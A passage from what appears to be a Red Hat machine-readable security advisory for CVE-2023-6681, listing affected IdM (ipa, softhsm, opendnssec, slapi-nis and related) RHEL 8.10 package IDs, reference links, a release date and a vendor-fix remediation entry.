"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19692+fac39a03.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19692+fac39a03.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-dns-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaserver-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipatests-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-6681"
},
{
"category": "external",
"summary": "RHBZ#2260843",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2260843"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-6681",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6681"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-6681",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6681"
}
],
"release_date": "2023-12-28T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-05-22T11:47:22+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
